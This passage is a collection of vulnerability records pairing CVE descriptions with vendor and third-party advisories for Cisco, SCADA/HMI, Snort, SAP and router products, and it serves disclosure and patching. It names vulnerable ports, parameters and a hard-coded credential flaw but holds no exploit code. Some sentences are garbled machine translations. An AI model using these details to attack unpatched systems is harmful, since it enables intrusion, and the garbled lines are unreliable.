of the Security Bulletin announces the availability of firmware updates for additional devices
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-202407-0046 mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device. Authentication is not required to exploit this vulnerability.The specific flaw exists within the telnet service, which listens on TCP port 5005 by default. The issue results from the use of hard-coded credentials. mySCADA myPRO is an application software. myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202410-2013 In mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Google of Android Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Google Pixel is a smartphone produced by Google in the United States. Google Pixel has a buffer overflow vulnerability. The vulnerability is caused by incorrect boundary checking in mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c. Attackers can exploit this vulnerability to cause out-of-bounds write
var-201105-0156 Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-155 : InduSoft Thin Client ISSymbol InternationalOrder Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-155 August 22, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12505. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-08-22 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUDUFHFVtgMGTo1scAQJ1Twf8C0MRiovFv7JVpAgg+lOYT3HW7MYdUKAx /I+4hvkGyeKKCCkvIOkx0y7eSdwp4paxVZAd0WYTfsG0K1h+bBngt6m+3Nicx0Iq YuqyOluJTW4ymXUSwvX8MZ39709DQXEl5yp9JvIX+Dc4WY7TKauGYKIfbb/VRMQq VYgQPhnlv8laGORlVREpu+yrOPdYLbQSucewpaLXd4b8uw1+Kmurjepiil5vxqPD G3fD23i1jGrbg6aX0AlvECo1M12alERft7wjtI21D7VP7G3uBYwiAJ8jxutavMQY Yf5K6rzdbx+96MuFco7aYB49GBQDpMYvWeWur3YEv1GqR7bSotpO1Q== =Yxrq -----END PGP SIGNATURE-----
var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201407-0233 Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-202411-1458 Cross Site Scripting vulnerability in DLink DWR 2000M 5G CPE With Wifi 6 Ax1800 and Dlink DWR 5G CPE DWR-2000M_1.34ME allows a local attacker to obtain sensitive information via the file upload feature of the VPN configuration module. D-Link Systems, Inc. of dwr-2000m Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. D-Link DWR-2000M is a wireless router from D-Link, a Chinese company. D-Link DWR-2000M has a cross-site scripting vulnerability. The vulnerability is caused by the lack of effective filtering and escaping of user-provided data by the application
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: 